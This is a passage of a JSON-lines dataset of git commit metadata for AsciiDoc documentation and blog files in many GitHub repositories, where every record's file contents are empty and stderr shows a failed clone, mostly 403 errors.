2016-11-10-Title-issue.adoc","message":"Update 2016-11-10-Title-issue.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/2016-11-10-Title-issue.adoc","new_file":"_posts\/2016-11-10-Title-issue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06ff79867959b88a98aa719ff62cf98dbe023d0c","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/07\/30\/deref.adoc","new_file":"content\/news\/2022\/07\/30\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d6af0aa87083f0d28c470ee1c02db7544d318283","subject":"Added recipe for enabling disabling users","message":"Added recipe for enabling disabling users\n","repos":"korczis\/gooddata-ruby-examples,korczis\/gooddata-ruby-examples","old_file":"02_working_with_users\/enabling_disabling_users.asciidoc","new_file":"02_working_with_users\/enabling_disabling_users.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/korczis\/gooddata-ruby-examples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a88dc95db9fa196c591d19236464089666dad2e","subject":"Renamed '_posts\/2019-01-31-Getting-Hip-with-J-Hpster-in-the-Java-Aktuell-Magazine.adoc' to '_posts\/2019-02-22-Getting-Hip-with-J-Hpster-in-the-Java-Aktuell-Magazine.adoc'","message":"Renamed '_posts\/2019-01-31-Getting-Hip-with-J-Hpster-in-the-Java-Aktuell-Magazine.adoc' to '_posts\/2019-02-22-Getting-Hip-with-J-Hpster-in-the-Java-Aktuell-Magazine.adoc'","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2019-02-22-Getting-Hip-with-J-Hpster-in-the-Java-Aktuell-Magazine.adoc","new_file":"_posts\/2019-02-22-Getting-Hip-with-J-Hpster-in-the-Java-Aktuell-Magazine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atomfrede\/shiny-adventure.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f3cb2e67569d39879a37868cf6a4fcc6f600f1c","subject":"minor update","message":"minor update\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"trex_vm_manual.asciidoc","new_file":"trex_vm_manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f11a255716190184f8eaeef1888fd5b82773aa66","subject":"doc: release-guide: add LTS details","message":"doc: release-guide: add LTS details\n\nSigned-off-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\nReviewed-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"ravineet-singh\/odp,ravineet-singh\/odp,dkrot\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,erachmi\/odp,mike-holmes-linaro\/odp,dkrot\/odp,nmorey\/odp,dkrot\/odp,nmorey\/odp,erachmi\/odp,erachmi\/odp,dkrot\/odp,ravineet-singh\/odp,nmorey\/odp,erachmi\/odp,nmorey\/odp,ravineet-singh\/odp","old_file":"doc\/process-guide\/release-guide.adoc","new_file":"doc\/process-guide\/release-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"d47ba43900399a4910f7bb45f11a37899f3875b5","subject":"Added Route Policy adoc","message":"Added Route Policy adoc\n","repos":"onders86\/camel,adessaigne\/camel,cunningt\/camel,nicolaferraro\/camel,alvinkwekel\/camel,CodeSmell\/camel,nikhilvibhav\/camel,Fabryprog\/camel,apache\/camel,tdiesler\/camel,tadayosi\/camel,onders86\/camel,christophd\/camel,tdiesler\/camel,Fabryprog\/camel,davidkarlsen\/camel,gnodet\/camel,kevinearls\/camel,zregvart\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,cunningt\/camel,adessaigne\/camel,pax95\/camel,tdiesler\/camel,christophd\/camel,davidkarlsen\/camel,christophd\/camel,christophd\/camel,tadayosi\/camel,tadayosi\/camel,apache\/camel,CodeSmell\/camel,cunningt\/camel,pax95\/camel,cunningt\/camel,tdiesler\/camel,mcollovati\/camel,adessaigne\/camel,tdiesler\/camel,pax95\/camel,gnodet\/camel,ullgren\/camel,onders86\/camel,adessaigne\/camel,onders86\/camel,DariusX\/camel,adessaigne\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,cunningt\/camel,pax95\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,apache\/camel,kevinearls\/camel,objectiser\/camel,zregvart\/camel,Fabryprog\/camel,gnodet\/camel,adessaigne\/camel,alvinkwekel\/camel,Fabryprog\/camel,kevinearls\/camel,pax95\/camel,punkhorn\/camel-upstream,alvinkwekel\/camel,kevinearls\/camel,ullgren\/camel,objectiser\/camel,DariusX\/camel,pmoerenhout\/camel,gnodet\/camel,punkhorn\/camel-upstream,ullgren\/camel,punkhorn\/camel-upstream,ullgren\/camel,alvinkwekel\/camel,pmoerenhout\/camel,mcollovati\/camel,pax95\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,mcollovati\/camel,davidkarlsen\/camel,zregvart\/camel,nicolaferraro\/camel,DariusX\/camel,cunningt\/camel,CodeSmell\/camel,pmoerenhout\/camel,christophd\/camel,tadayosi\/camel,nicolaferraro\/camel,tadayosi\/camel,CodeSmell\/camel,objectiser\/camel,apache\/camel,zregvart\/camel,christophd\/camel,tdiesler\/camel,apache\/camel,kevinearls\/camel,pmoerenhout\/camel,DariusX\/camel,objectiser\/camel,onders86\/camel,apache\/camel,mcollovati\/camel,kevinearls\/camel,tadayosi\/camel,onders86\/camel,gnodet\/camel","old_file":"docs\/user-manual\/en\/routepolicy.adoc","new_file":"docs\/user-manual\/en\/routepolicy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b29c1cc70bb25be87c5b1deb326e05691a637616","subject":"Update 2016-03-22-Micro-services-for-performance.adoc","message":"Update 2016-03-22-Micro-services-for-performance.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-03-22-Micro-services-for-performance.adoc","new_file":"_posts\/2016-03-22-Micro-services-for-performance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36e855aa1cad03eaa5b068e773a199a702628ef2","subject":"Update 2016-04-10-m.adoc","message":"Update 2016-04-10-m.adoc","repos":"dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io","old_file":"_posts\/2016-04-10-m.adoc","new_file":"_posts\/2016-04-10-m.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dingboopt\/dingboopt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecd6e618a0f7975812502a6cab9196676284b264","subject":"added howto guide on how to make the tracking environment. changed the analytics web report to fetch last 15 days of regression. added rule to ws_main to build the howto guide","message":"added howto guide on how to make the tracking environment. changed the analytics web report to fetch last 15 days of regression. added rule to ws_main to build the howto guide\n\nSigned-off-by: itraviv <d9922b8887db131d20f65fdcbad18ce7f1ad9059@cisco.com>\n","repos":"dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"doc\/trex-analytics-howto.asciidoc","new_file":"doc\/trex-analytics-howto.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"004b0d355ff5cf42cf000495525e81f07c8e8293","subject":"Update 2015-03-04-Game-design.adoc","message":"Update 2015-03-04-Game-design.adoc","repos":"caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io","old_file":"_posts\/2015-03-04-Game-design.adoc","new_file":"_posts\/2015-03-04-Game-design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caryfitzhugh\/caryfitzhugh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4bb433421601b04d1d759c0ec718705bb6940e9","subject":"Update 2015-08-16-hello-world.adoc","message":"Update 2015-08-16-hello-world.adoc","repos":"gsera\/gsera.github.io,gsera\/gsera.github.io,gsera\/gsera.github.io","old_file":"_posts\/2015-08-16-hello-world.adoc","new_file":"_posts\/2015-08-16-hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gsera\/gsera.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71a9fd498dcaa5f53204e406f179f28882c56e55","subject":"Update 2016-01-25-Hello-World.adoc","message":"Update 2016-01-25-Hello-World.adoc","repos":"hyha600\/hyha600.github.io,hyha600\/hyha600.github.io,hyha600\/hyha600.github.io","old_file":"_posts\/2016-01-25-Hello-World.adoc","new_file":"_posts\/2016-01-25-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hyha600\/hyha600.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff2738199e9d8b198cd5b4cf29a662632070141a","subject":"Update 2016-07-13-Git-command.adoc","message":"Update 2016-07-13-Git-command.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-13-Git-command.adoc","new_file":"_posts\/2016-07-13-Git-command.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f776b44d726d6ff03ff6b9eef3d9a0f796fe562a","subject":"lab 4 v3","message":"lab 4 v3\n","repos":"dm-academy\/aitm-labs,dm-academy\/aitm-labs,dm-academy\/aitm-labs","old_file":"Lab-04\/04-tech-lab-v3.adoc","new_file":"Lab-04\/04-tech-lab-v3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dm-academy\/aitm-labs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"520fa6d33b7ef546c317dc98c5d098e00a4d3af8","subject":"Publish 2016-7-2-thinphp.adoc","message":"Publish 2016-7-2-thinphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-2-thinphp.adoc","new_file":"2016-7-2-thinphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aed66bbb4ee27dd59f51151712610f82cd4853a3","subject":"Update 2016-11-24-G-A-S.adoc","message":"Update 2016-11-24-G-A-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-24-G-A-S.adoc","new_file":"_posts\/2016-11-24-G-A-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9958f5f8490d94dd9b440b0fe08a74e022e5ab4","subject":"Update 2018-10-01-D3js1.adoc","message":"Update 2018-10-01-D3js1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-01-D3js1.adoc","new_file":"_posts\/2018-10-01-D3js1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"efe7a68bfefd3fd78bb6bff16d7e18dc67bc6ad5","subject":"y2b create post Testing My New Superhuman Legs","message":"y2b create post Testing My New Superhuman Legs","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-19-Testing-My-New-Superhuman-Legs.adoc","new_file":"_posts\/2017-01-19-Testing-My-New-Superhuman-Legs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"316f22a1220688d9595f7cba483c717a09beae34","subject":"Update 2016-02-16-Wordpress-Needs-To-Die.adoc","message":"Update 2016-02-16-Wordpress-Needs-To-Die.adoc","repos":"jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io","old_file":"_posts\/2016-02-16-Wordpress-Needs-To-Die.adoc","new_file":"_posts\/2016-02-16-Wordpress-Needs-To-Die.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmelfi\/jmelfi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"474136ec0c13e9cc3a8df36bc20c7b065b34f4e4","subject":"Publish 2015-5-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","message":"Publish 2015-5-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"2015-5-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","new_file":"2015-5-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2472c06aedcac19a777913436e4310896870d743","subject":"Deleted 2016-12-2-3-Dpen.adoc","message":"Deleted 2016-12-2-3-Dpen.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-2-3-Dpen.adoc","new_file":"2016-12-2-3-Dpen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ef83dd443a05e9122681950399edaa58a38d466","subject":"Updated run_dev instructions.","message":"Updated run_dev instructions.\n\nAlso, removed the deprecated --package_manager option in install_development.sh\n","repos":"jtk54\/spinnaker,Roshan2017\/spinnaker,stitchfix\/spinnaker,spinnaker\/spinnaker,spinnaker\/spinnaker,ewiseblatt\/spinnaker,duftler\/spinnaker,duftler\/spinnaker,spinnaker\/spinnaker,Roshan2017\/spinnaker,duftler\/spinnaker,ewiseblatt\/spinnaker,skim1420\/spinnaker,imosquera\/spinnaker,tgracchus\/spinnaker,tgracchus\/spinnaker,skim1420\/spinnaker,duftler\/spinnaker,jtk54\/spinnaker,spinnaker\/spinnaker,stitchfix\/spinnaker,ewiseblatt\/spinnaker,imosquera\/spinnaker,jtk54\/spinnaker,skim1420\/spinnaker,imosquera\/spinnaker,Roshan2017\/spinnaker,skim1420\/spinnaker,tgracchus\/spinnaker,ewiseblatt\/spinnaker,stitchfix\/spinnaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/duftler\/spinnaker.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"166ecf4d8de7f6a98c3e66adb9158d4286ebb75e","subject":"add badges","message":"add badges\n","repos":"ollin\/wstageorg,ollin\/wstageorg,ollin\/wstageorg","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ollin\/wstageorg.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"d638b497faef8c2cdcb492ff43a5a0afcea880f3","subject":"Issue 377 (#386)","message":"Issue 377 (#386)\n\n* Fix #377\r\n\r\nadd systemProperties.adoc\r\n\r\n* Fix #377\r\n\r\nedit systemProperties.adoc\r\n\r\n* Fix #377\r\n\r\nedit getBoolean\r\n\r\n* Fix #377 - tweak getBoolean","repos":"OpenHFT\/Chronicle-Bytes","old_file":"systemProperties.adoc","new_file":"systemProperties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Bytes.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4de4072dc824866000b5686f386934644185dd2e","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45999474d3df9051f7d056937d28d8356b24531e","subject":"Update 2016-11-18-Sass-Awesome.adoc","message":"Update 2016-11-18-Sass-Awesome.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"722ee4917a50f4456b6d486daa860922436ded9a","subject":"Minor fix","message":"Minor fix","repos":"jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,ppalaga\/hawkular.github.io,tsegismont\/hawkular.github.io,metlos\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,lzoubek\/hawkular.github.io,jotak\/hawkular.github.io,ppalaga\/hawkular.github.io,ppalaga\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,ppalaga\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,pilhuhn\/hawkular.github.io,lzoubek\/hawkular.github.io,jotak\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,metlos\/hawkular.github.io,metlos\/hawkular.github.io,metlos\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/user\/getting-started.adoc","new_file":"src\/main\/jbake\/content\/docs\/user\/getting-started.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5c9e6f176561f402e01f0a1734915600d58d240f","subject":"Update 2011-08-04-Creer-un-tag-svn-en-utilisant-Ant.adoc","message":"Update 2011-08-04-Creer-un-tag-svn-en-utilisant-Ant.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2011-08-04-Creer-un-tag-svn-en-utilisant-Ant.adoc","new_file":"_posts\/2011-08-04-Creer-un-tag-svn-en-utilisant-Ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a7401f258051b7fa6c15af9691d3b0a265f76e9","subject":"Update 2017-01-17-Ideas.adoc","message":"Update 2017-01-17-Ideas.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2017-01-17-Ideas.adoc","new_file":"_posts\/2017-01-17-Ideas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31423a08ac9917744d179855ee2dcf1d383798c4","subject":"Update 2017-05-03-Intro.adoc","message":"Update 2017-05-03-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70fbbdde139d92410d88c3d98eadb011dcd6316d","subject":"Proposing a rule prerequisites section ","message":"Proposing a rule prerequisites section \n\nas discussed","repos":"redhat-italy\/hacep,redhat-italy\/hacep,redhat-italy\/hacep,redhat-italy\/hacep","old_file":"doc\/prerequisites.adoc","new_file":"doc\/prerequisites.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-italy\/hacep.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"003bcdf72c2d8c8ff45aa70b9f906a800a24c71e","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f6c8a54c440ceef4a5f3b8d2efd86e548459ac0","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76aea0a428822a84bf8b8bf83bb27dc59a9844d0","subject":"Update 2016-11-07-202800-Monday-Evening.adoc","message":"Update 2016-11-07-202800-Monday-Evening.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-202800-Monday-Evening.adoc","new_file":"_posts\/2016-11-07-202800-Monday-Evening.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf27ab3aae04e7ed990c5d5d364b21679808da2e","subject":"Cannot scale network in a stack","message":"Cannot scale network in a stack","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e71701ed557d36692ab0cfc5c0fcad1acd6b1446","subject":"Per workspace","message":"Per workspace\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Eclipse.adoc","new_file":"Dev tools\/Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3586ee1cefdd691a2ec2f928440254606374f67f","subject":"added exercise 1 folder","message":"added exercise 1 folder\n","repos":"christer155\/javaee-exercises,ivargrimstad\/javaee-exercises,cybercomsweden\/javaee-exercises,ivargrimstad\/javaee-exercises,christer155\/javaee-exercises,cybercomsweden\/javaee-exercises","old_file":"exercise-1\/README.adoc","new_file":"exercise-1\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivargrimstad\/javaee-exercises.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7bd0eae04813369340e9844e91d065870a14d960","subject":"Update 2016-04-19-Code-Contracts.adoc","message":"Update 2016-04-19-Code-Contracts.adoc","repos":"mrcouthy\/mrcouthy.github.io,mrcouthy\/mrcouthy.github.io,mrcouthy\/mrcouthy.github.io,mrcouthy\/mrcouthy.github.io","old_file":"_posts\/2016-04-19-Code-Contracts.adoc","new_file":"_posts\/2016-04-19-Code-Contracts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrcouthy\/mrcouthy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80e850d93d7328b3c65502c1ae68f920228a9583","subject":"Publish 2016-6-25-Git-one.adoc","message":"Publish 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"remote: Support for password authentication was removed on August 13, 2021.\nremote: Please see https:\/\/docs.github.com\/en\/get-started\/getting-started-with-git\/about-remote-repositories#cloning-with-https-urls for information on currently recommended modes of authentication.\nfatal: Authentication failed for 